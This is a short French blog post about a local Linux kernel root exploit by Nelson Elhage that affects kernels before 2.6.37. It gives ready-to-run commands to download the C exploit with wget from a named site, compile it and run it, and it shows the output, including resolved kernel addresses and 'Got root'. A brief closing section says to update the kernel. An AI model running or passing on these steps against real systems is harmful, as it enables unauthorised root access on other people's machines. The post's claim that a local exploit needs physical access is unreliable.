Voici la toute dernière faille de sécurité Linux, Un script écrit en C par Nelson Elhage, une fois exécuté, peut s’approprier les droits root sur la machine. L’exploit est local (bien heureusement), c’est à dire qu’il faut un accès phisique à la machine.
Exploitation
Il suffit de télécharger le script en C, le compiler, puis le lancer !
Code:
$ wget www.geeknoise.com/scripts/nelson.c $ gcc -o nelson nelson.c $ ./nelson[*] Resolving kernel addresses... [+] Resolved econet_ioctl to 0xf80f02a0 [+] Resolved econet_ops to 0xf80f03a0 [+] Resolved commit_creds to 0xc016c830 [+] Resolved prepare_kernel_cred to 0xc016cc80[*] Calculating target...[*] Triggering payload...[*] Got root! #
Eh bien, constatez par vous même :
Comment s’en protéger ?
Cet exploit concerne les versions inférieures à 2.6.37 du kernel. Une simple mise à jour corrigera donc le problème.
Slackware, debian, et redhat ne sont pas concernées par cet exploit, et Ubuntu 10.10 non plus, je vous rassure
Source:geeknoise